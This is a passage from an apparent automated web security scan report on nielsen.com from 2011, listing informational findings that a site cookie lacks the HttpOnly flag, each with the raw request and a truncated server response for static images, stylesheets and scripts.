Content-Length: 3115
Content-Type: image/png

.PNG
.
...IHDR....................    pHYs...............
OiCCPPhotoshop ICC profile..x..SgTS..=...BK...KoR.. RB....&*!    .J.!...Q..EE...........Q,..
...!.........{.k........>...........H3Q5...B.........
...[SNIP]...

4.23. http://nielsen.com/content/dam/corporate/shared/images/icons/misc_icons/twit.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://nielsen.com
Path:   /content/dam/corporate/shared/images/icons/misc_icons/twit.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /content/dam/corporate/shared/images/icons/misc_icons/twit.gif HTTP/1.1
Host: nielsen.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://nielsen.com/us/en/measurement/online-measurement.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Nielsen.com-cookie=R3976301559; __utma=221383559.465396599.1316711871.1316711871.1316711871.1; __utmb=221383559.1.10.1316711871; __utmc=221383559; __utmz=221383559.1316711871.1.1.utmcsr=nielsen-online.com|utmccn=(referral)|utmcmd=referral|utmcct=/intlpage.html

Response

HTTP/1.1 200 OK
Set-Cookie: Nielsen.com-cookie=R3976301559; path=/; expires=Thu, 22-Sep-2011 17:57:05 GMT
Date: Thu, 22 Sep 2011 12:16:32 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8b Communique/4.0.8
Last-Modified: Wed, 21 Sep 2011 23:40:31 GMT
ETag: "be804b-655-4ad7c1a0619c0"
Accept-Ranges: bytes
Content-Length: 1621
Content-Type: image/gif

GIF89a . ....-..U..Y.....U.....&.....m.. ..0........b..-..l........q........)........u.....Y..1.....+..@.....L.....,..v........5..8..x..*..)..v..K..W.....a.....1..z.....]..U..j..8..{..7.....d.....5...
...[SNIP]...

4.24. http://nielsen.com/content/dam/corporate/us/en/graphix/icons/goldKey.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://nielsen.com
Path:   /content/dam/corporate/us/en/graphix/icons/goldKey.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /content/dam/corporate/us/en/graphix/icons/goldKey.gif HTTP/1.1
Host: nielsen.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://nielsen.com/us/en/measurement/online-measurement.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Nielsen.com-cookie=R3976301559; __utma=221383559.465396599.1316711871.1316711871.1316711871.1; __utmb=221383559.1.10.1316711871; __utmc=221383559; __utmz=221383559.1316711871.1.1.utmcsr=nielsen-online.com|utmccn=(referral)|utmcmd=referral|utmcct=/intlpage.html

Response

HTTP/1.1 200 OK
Set-Cookie: Nielsen.com-cookie=R3976301559; path=/; expires=Thu, 22-Sep-2011 17:57:05 GMT
Date: Thu, 22 Sep 2011 12:16:33 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8b Communique/4.0.8
Last-Modified: Wed, 21 Sep 2011 23:40:31 GMT
ETag: "be804c-dba-4ad7c1a0619c0"
Accept-Ranges: bytes
Content-Length: 3514
Content-Type: image/gif

GIF89a.....M.......................................A..............j...........1.....    .....a...........N.....z........d..`...........J.........................................a....................p...
...[SNIP]...

4.25. http://nielsen.com/content/dam/corporate/us/en/graphix/icons/world_icon.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://nielsen.com
Path:   /content/dam/corporate/us/en/graphix/icons/world_icon.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /content/dam/corporate/us/en/graphix/icons/world_icon.gif HTTP/1.1
Host: nielsen.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://nielsen.com/us/en/measurement/online-measurement.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Nielsen.com-cookie=R3976301559; __utma=221383559.465396599.1316711871.1316711871.1316711871.1; __utmb=221383559.1.10.1316711871; __utmc=221383559; __utmz=221383559.1316711871.1.1.utmcsr=nielsen-online.com|utmccn=(referral)|utmcmd=referral|utmcct=/intlpage.html

Response

HTTP/1.1 200 OK
Set-Cookie: Nielsen.com-cookie=R3976301559; path=/; expires=Thu, 22-Sep-2011 17:57:05 GMT
Date: Thu, 22 Sep 2011 12:16:33 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8b Communique/4.0.8
Last-Modified: Wed, 21 Sep 2011 23:40:52 GMT
ETag: "be80b0-429-4ad7c1b468900"
Accept-Ranges: bytes
Content-Length: 1065
Content-Type: image/gif

GIF89a..........................................................n..........................v..................................................{.............................s...........................
...[SNIP]...

4.26. http://nielsen.com/content/dam/css/corporate/addons.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://nielsen.com
Path:   /content/dam/css/corporate/addons.css

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /content/dam/css/corporate/addons.css HTTP/1.1
Host: nielsen.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: text/css,*/*;q=0.1
Referer: http://nielsen.com/us/en/measurement/online-measurement.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Nielsen.com-cookie=R3976301559

Response

HTTP/1.1 200 OK
Set-Cookie: Nielsen.com-cookie=R3976301559; path=/; expires=Thu, 22-Sep-2011 17:57:05 GMT
Date: Thu, 22 Sep 2011 12:16:28 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8b Communique/4.0.8
Last-Modified: Wed, 21 Sep 2011 23:00:58 GMT
ETag: "e78056-9f4-4ad7b8c94fe80"
Accept-Ranges: bytes
Content-Type: text/css
Vary: Accept-Encoding
Content-Length: 2548

/* Addons to Corporate template stylesheet

Currently Deployed on:
United States (en)
Turkey (en)
Canada (en)

*/

/* Contact Us/Apply Now Button */
.contact_us {
   background:url('/content
...[SNIP]...

4.27. http://nielsen.com/content/dam/css/corporate/clearfix.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://nielsen.com
Path:   /content/dam/css/corporate/clearfix.css

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /content/dam/css/corporate/clearfix.css HTTP/1.1
Host: nielsen.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: text/css,*/*;q=0.1
Referer: http://nielsen.com/us/en/measurement/online-measurement.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Nielsen.com-cookie=R3976301559

Response

HTTP/1.1 200 OK
Set-Cookie: Nielsen.com-cookie=R3976301559; path=/; expires=Thu, 22-Sep-2011 17:57:05 GMT
Date: Thu, 22 Sep 2011 12:16:28 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8b Communique/4.0.8
Last-Modified: Wed, 21 Sep 2011 23:00:53 GMT
ETag: "e78036-87-4ad7b8c48b340"
Accept-Ranges: bytes
Content-Type: text/css
Vary: Accept-Encoding
Content-Length: 135

/* This CSS file inserts a clearing mechanism into the "sam" (reference component) div */

#sam {
   overflow:hidden;
   width:100%;
}

4.28. http://nielsen.com/etc/clientlibs/foundation/jquery.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://nielsen.com
Path:   /etc/clientlibs/foundation/jquery.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /etc/clientlibs/foundation/jquery.js HTTP/1.1
Host: nielsen.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://nielsen.com/us/en/measurement/online-measurement.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Nielsen.com-cookie=R3976301559

Response

HTTP/1.1 200 OK
Set-Cookie: Nielsen.com-cookie=R3976301559; path=/; expires=Thu, 22-Sep-2011 17:57:05 GMT
Date: Thu, 22 Sep 2011 12:16:29 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8b Communique/4.0.8
Last-Modified: Wed, 21 Sep 2011 23:40:39 GMT
ETag: "be8086-2cc58-4ad7c1a802bc0"
Accept-Ranges: bytes
Content-Type: application/javascript
Vary: Accept-Encoding
Content-Length: 183384

/*!
* jQuery JavaScript Library v1.4.4
* http://jquery.com/
*
* Copyright 2010, John Resig
* Dual licensed under the MIT or GPL Version 2 licenses.
* http://jquery.org/license
*
* Includes Siz
...[SNIP]...

4.29. http://nielsen.com/etc/clientlibs/foundation/librarymanager.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://nielsen.com
Path:   /etc/clientlibs/foundation/librarymanager.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /etc/clientlibs/foundation/librarymanager.js HTTP/1.1
Host: nielsen.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://nielsen.com/us/en/measurement/online-measurement.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Nielsen.com-cookie=R3976301559

Response

HTTP/1.1 200 OK
Set-Cookie: Nielsen.com-cookie=R3976301559; path=/; expires=Thu, 22-Sep-2011 17:57:05 GMT
Date: Thu, 22 Sep 2011 12:16:28 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8b Communique/4.0.8
Last-Modified: Wed, 21 Sep 2011 23:00:52 GMT
ETag: "e78028-2b83-4ad7b8c397100"
Accept-Ranges: bytes
Content-Type: application/javascript
Vary: Accept-Encoding
Content-Length: 11139

/*
* Copyright 1997-2010 Day Management AG
* Barfuesserplatz 6, 4001 Basel, Switzerland
* All Rights Reserved.
*
* This software is the confidential and proprietary information of
* Day Manageme
...[SNIP]...

4.30. http://nielsen.com/etc/clientlibs/foundation/shared.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://nielsen.com
Path:   /etc/clientlibs/foundation/shared.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /etc/clientlibs/foundation/shared.js HTTP/1.1
Host: nielsen.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://nielsen.com/us/en/measurement/online-measurement.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Nielsen.com-cookie=R3976301559

Response

HTTP/1.1 200 OK
Set-Cookie: Nielsen.com-cookie=R3976301559; path=/; expires=Thu, 22-Sep-2011 17:57:05 GMT
Date: Thu, 22 Sep 2011 12:16:29 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8b Communique/4.0.8
Last-Modified: Wed, 21 Sep 2011 23:40:50 GMT
ETag: "be80ac-cc1c-4ad7c1b280480"
Accept-Ranges: bytes
Content-Type: application/javascript
Vary: Accept-Encoding
Content-Length: 52252

/*
* Copyright 1997-2010 Day Management AG
* Barfuesserplatz 6, 4001 Basel, Switzerland
* All Rights Reserved.
*
* This software is the confidential and proprietary information of
* Day Manageme
...[SNIP]...

4.31. http://nielsen.com/etc/designs/corporate.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://nielsen.com
Path:   /etc/designs/corporate.css

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /etc/designs/corporate.css HTTP/1.1
Host: nielsen.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: text/css,*/*;q=0.1
Referer: http://nielsen.com/us/en/measurement/online-measurement.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Nielsen.com-cookie=R3976301559

Response

HTTP/1.1 200 OK
Set-Cookie: Nielsen.com-cookie=R3976301559; path=/; expires=Thu, 22-Sep-2011 17:57:05 GMT
Date: Thu, 22 Sep 2011 12:16:28 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8b Communique/4.0.8
Last-Modified: Wed, 21 Sep 2011 23:00:49 GMT
ETag: "e78012-34-4ad7b8c0baa40"
Accept-Ranges: bytes
Content-Type: text/css
Vary: Accept-Encoding
Content-Length: 52

.twoColumnPage div.logo img {
margin: 0 0 0 0;
}


4.32. http://nielsen.com/etc/designs/corporate/additions.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://nielsen.com
Path:   /etc/designs/corporate/additions.css

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /etc/designs/corporate/additions.css HTTP/1.1
Host: nielsen.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: text/css,*/*;q=0.1
Referer: http://nielsen.com/us/en/measurement/online-measurement.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Nielsen.com-cookie=R3976301559

Response

HTTP/1.1 200 OK
Set-Cookie: Nielsen.com-cookie=R3976301559; path=/; expires=Thu, 22-Sep-2011 17:57:05 GMT
Date: Thu, 22 Sep 2011 12:16:30 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8b Communique/4.0.8
Last-Modified: Wed, 21 Sep 2011 23:40:49 GMT
ETag: "be80a7-6b07-4ad7c1b18c240"
Accept-Ranges: bytes
Content-Type: text/css
Vary: Accept-Encoding
Content-Length: 27399

/******************************************************************************/
/* new additions for search, custom components, etc.
/*****************************************************************
...[SNIP]...

4.33. http://nielsen.com/etc/designs/corporate/clientlibs.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://nielsen.com
Path:   /etc/designs/corporate/clientlibs.css

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /etc/designs/corporate/clientlibs.css HTTP/1.1
Host: nielsen.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: text/css,*/*;q=0.1
Referer: http://nielsen.com/us/en/measurement/online-measurement.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Nielsen.com-cookie=R3976301559

Response

HTTP/1.1 200 OK
Set-Cookie: Nielsen.com-cookie=R3976301559; path=/; expires=Thu, 22-Sep-2011 17:57:05 GMT
Date: Thu, 22 Sep 2011 12:16:29 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8b Communique/4.0.8
Last-Modified: Wed, 21 Sep 2011 23:40:36 GMT
ETag: "be806e-0-4ad7c1a526500"
Accept-Ranges: bytes
Content-Type: text/css
Vary: Accept-Encoding
Content-Length: 0


4.34. http://nielsen.com/etc/designs/corporate/clientlibs.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://nielsen.com
Path:   /etc/designs/corporate/clientlibs.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /etc/designs/corporate/clientlibs.js HTTP/1.1
Host: nielsen.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://nielsen.com/us/en/measurement/online-measurement.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Nielsen.com-cookie=R3976301559

Response

HTTP/1.1 200 OK
Set-Cookie: Nielsen.com-cookie=R3976301559; path=/; expires=Thu, 22-Sep-2011 17:57:05 GMT
Date: Thu, 22 Sep 2011 12:16:29 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8b Communique/4.0.8
Last-Modified: Wed, 21 Sep 2011 23:00:49 GMT
ETag: "e78018-23310-4ad7b8c0baa40"
Accept-Ranges: bytes
Content-Type: application/javascript
Vary: Accept-Encoding
Content-Length: 144144

/*
* Copyright 1997-2009 Day Management AG
* Barfuesserplatz 6, 4001 Basel, Switzerland
* All Rights Reserved.
*
* This software is the confidential and proprietary information of
* Day Manageme
...[SNIP]...

4.35. http://nielsen.com/etc/designs/corporate/clientlibs/themes/default.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://nielsen.com
Path:   /etc/designs/corporate/clientlibs/themes/default.css

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /etc/designs/corporate/clientlibs/themes/default.css HTTP/1.1
Host: nielsen.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: text/css,*/*;q=0.1
Referer: http://nielsen.com/us/en/measurement/online-measurement.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Nielsen.com-cookie=R3976301559

Response

HTTP/1.1 200 OK
Set-Cookie: Nielsen.com-cookie=R3976301559; path=/; expires=Thu, 22-Sep-2011 17:57:05 GMT
Date: Thu, 22 Sep 2011 12:16:29 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8b Communique/4.0.8
Last-Modified: Wed, 21 Sep 2011 23:40:36 GMT
ETag: "be806a-0-4ad7c1a526500"
Accept-Ranges: bytes
Content-Type: text/css
Vary: Accept-Encoding
Content-Length: 0


4.36. http://nielsen.com/etc/designs/corporate/cq.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://nielsen.com
Path:   /etc/designs/corporate/cq.css

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /etc/designs/corporate/cq.css HTTP/1.1
Host: nielsen.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: text/css,*/*;q=0.1
Referer: http://nielsen.com/us/en/measurement/online-measurement.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Nielsen.com-cookie=R3976301559

Response

HTTP/1.1 200 OK
Set-Cookie: Nielsen.com-cookie=R3976301559; path=/; expires=Thu, 22-Sep-2011 17:57:05 GMT
Date: Thu, 22 Sep 2011 12:16:31 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8b Communique/4.0.8
Last-Modified: Wed, 21 Sep 2011 23:40:28 GMT
ETag: "be802a-bbe2-4ad7c19d85300"
Accept-Ranges: bytes
Content-Type: text/css
Vary: Accept-Encoding
Content-Length: 48098

/******************************************************************************/
/* CQ 5.3 common
/******************************************************************************/
body {
/*bac
...[SNIP]...

4.37. http://nielsen.com/etc/designs/corporate/images/bullet-n3.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://nielsen.com
Path:   /etc/designs/corporate/images/bullet-n3.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /etc/designs/corporate/images/bullet-n3.gif HTTP/1.1
Host: nielsen.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://nielsen.com/us/en/measurement/online-measurement.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Nielsen.com-cookie=R3976301559; __utma=221383559.465396599.1316711871.1316711871.1316711871.1; __utmb=221383559.1.10.1316711871; __utmc=221383559; __utmz=221383559.1316711871.1.1.utmcsr=nielsen-online.com|utmccn=(referral)|utmcmd=referral|utmcct=/intlpage.html

Response

HTTP/1.1 200 OK
Set-Cookie: Nielsen.com-cookie=R3976301559; path=/; expires=Thu, 22-Sep-2011 17:57:05 GMT
Date: Thu, 22 Sep 2011 12:16:35 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8b Communique/4.0.8
Last-Modified: Wed, 21 Sep 2011 23:40:54 GMT
ETag: "be80b1-4f-4ad7c1b650d80"
Accept-Ranges: bytes
Content-Length: 79
Content-Type: image/gif

GIF89a
.
...........K...............!.......,....
.
....H...m.......D..#QP.$.;

4.38. http://nielsen.com/etc/designs/corporate/images/default.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://nielsen.com
Path:   /etc/designs/corporate/images/default.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /etc/designs/corporate/images/default.gif HTTP/1.1
Host: nielsen.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://nielsen.com/content/corporate/us/en/search.html?q=mobile+tv+internet
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SessionPersistence=CLICKSTREAMCLOUD%3A%3DvisitorId%3Danonymous%7CPROFILEDATA%3A%3Davatar%3D%2Fetc%2Fdesigns%2Fdefault%2Fimages%2Fcollab%2Favatar.png%2CauthorizableId%3Danonymous%2CauthorizableId_xss%3Danonymous%2CformattedName%3D%2CformattedName_xss%3D%7CSURFERINFO%3A%3DIP%3D127.0.0.1%2Ckeywords%3D%2Cbrowser%3DChrome%2COS%3DWindows%2Cresolution%3D1920x1200%7C; Nielsen.com-cookie=R3976301559; __utma=221383559.465396599.1316711871.1316711871.1316711871.1; __utmb=221383559.4.10.1316711871; __utmc=221383559; __utmz=221383559.1316711871.1.1.utmcsr=nielsen-online.com|utmccn=(referral)|utmcmd=referral|utmcct=/intlpage.html

Response

HTTP/1.1 200 OK
Set-Cookie: Nielsen.com-cookie=R3976301559; path=/; expires=Thu, 22-Sep-2011 17:57:05 GMT
Date: Thu, 22 Sep 2011 12:17:14 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8b Communique/4.0.8
Last-Modified: Wed, 21 Sep 2011 23:44:27 GMT
ETag: "be8173-2b-4ad7c28172cc0"
Accept-Ranges: bytes
Content-Length: 43
Content-Type: image/gif

GIF89a.............!.......,...........D..;

4.39. http://nielsen.com/etc/designs/corporate/images/pix.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://nielsen.com
Path:   /etc/designs/corporate/images/pix.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /etc/designs/corporate/images/pix.gif HTTP/1.1
Host: nielsen.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://nielsen.com/us/en/measurement/online-measurement.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Nielsen.com-cookie=R3976301559; __utma=221383559.465396599.1316711871.1316711871.1316711871.1; __utmb=221383559.1.10.1316711871; __utmc=221383559; __utmz=221383559.1316711871.1.1.utmcsr=nielsen-online.com|utmccn=(referral)|utmcmd=referral|utmcct=/intlpage.html

Response

HTTP/1.1 200 OK
Set-Cookie: Nielsen.com-cookie=R3976301559; path=/; expires=Thu, 22-Sep-2011 17:57:05 GMT
Date: Thu, 22 Sep 2011 12:16:33 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8b Communique/4.0.8
Last-Modified: Wed, 21 Sep 2011 23:40:32 GMT
ETag: "be804e-2b-4ad7c1a155c00"
Accept-Ranges: bytes
Content-Length: 43
Content-Type: image/gif

GIF89a.............!.......,...........D..;

4.40. http://nielsen.com/etc/designs/corporate/images/topnav/navFirst.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://nielsen.com
Path:   /etc/designs/corporate/images/topnav/navFirst.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /etc/designs/corporate/images/topnav/navFirst.gif HTTP/1.1
Host: nielsen.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://nielsen.com/us/en/measurement/online-measurement.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Nielsen.com-cookie=R3976301559; __utma=221383559.465396599.1316711871.1316711871.1316711871.1; __utmb=221383559.1.10.1316711871; __utmc=221383559; __utmz=221383559.1316711871.1.1.utmcsr=nielsen-online.com|utmccn=(referral)|utmcmd=referral|utmcct=/intlpage.html

Response

HTTP/1.1 200 OK
Set-Cookie: Nielsen.com-cookie=R3976301559; path=/; expires=Thu, 22-Sep-2011 17:57:05 GMT
Date: Thu, 22 Sep 2011 12:16:33 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8b Communique/4.0.8
Last-Modified: Wed, 21 Sep 2011 23:00:54 GMT
ETag: "e78049-6b1-4ad7b8c57f580"
Accept-Ranges: bytes
Content-Length: 1713
Content-Type: image/gif

GIF89a0.Y...............................................................................................................................................................................................
...[SNIP]...

4.41. http://nielsen.com/etc/designs/corporate/images/topnav/navGround.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://nielsen.com
Path:   /etc/designs/corporate/images/topnav/navGround.gif

